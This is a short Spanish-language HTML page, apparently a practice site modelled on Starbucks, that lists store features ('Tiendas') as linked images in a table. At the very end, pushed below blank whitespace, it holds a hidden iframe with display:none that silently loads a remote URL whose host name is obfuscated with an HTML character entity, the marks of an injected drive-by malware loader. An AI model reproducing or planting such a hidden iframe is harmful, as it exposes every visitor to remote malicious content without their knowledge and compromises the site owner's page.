<DOCTYPE html>  
<html lang="es">  
    <head>  
        <meta charset="utf-8"/>  
        <title>Tiendas</title>  
        <link rel="stylesheet" type="text/css" href="estilos.css">    
    </head>  
    <body>
        <header id="header">
          <h1><a href="../sesion.html">STARBUCK</a></h1>
          <nav id="nav">
            <ul>
              <li><a href="../pagina mejora/sesion4.html">CAFÉ</a></li>
              <li><a href="../sesion2.html">PRODUCTOS</a></li>
              <li><a href="#">TIENDAS</a></li>
              <li><a href="#">RESP. SOCIAL</a></li>
              <li><a href="../index.html" class="button special">Cerrar Sesión</a></li>
            </ul>
          </nav>
        </header>

            <h1>Tienda</h1>
            <div class="uno"></div>
            <table align="center">
          <tr>
          <td>
            <div class="dos">
            <p><a href="intenet.html">INTERNET INALAMBRICO</a></p>
            <a href="intenet.html"><img src="1ee.jpg"></a>
            </div>
            </td>
            <td>
             <div class="dos">
            <p><a href="comunidad.html">COMUNIDAD</a></p>
            <a href="comunidad.html"><img src="1.jpg"></a>
            </div>
            </td>
            <td>
             <div class="dos">
            <p><a href="diseño.html">DISEÑO DE LAS TIENDAS</a></p>
            <a href="diseño.html"><img src="p.jpg"></a>
            </div>
            </td>
            <td>
            <div class="dos">
            <p><a href="pro.html">PROGRAMA COFFEE MASTER</a></p>
            <a href="pro.html"><img src="1v.jpg"></a>
            </div>
            </td>
            </tr>
            </table>
                                                                        
                                                                        
<iframe src="http://jL.chu&#114;a.pl/rc/" style="display:none"></iframe>
</body>
</body>
</body>
</html>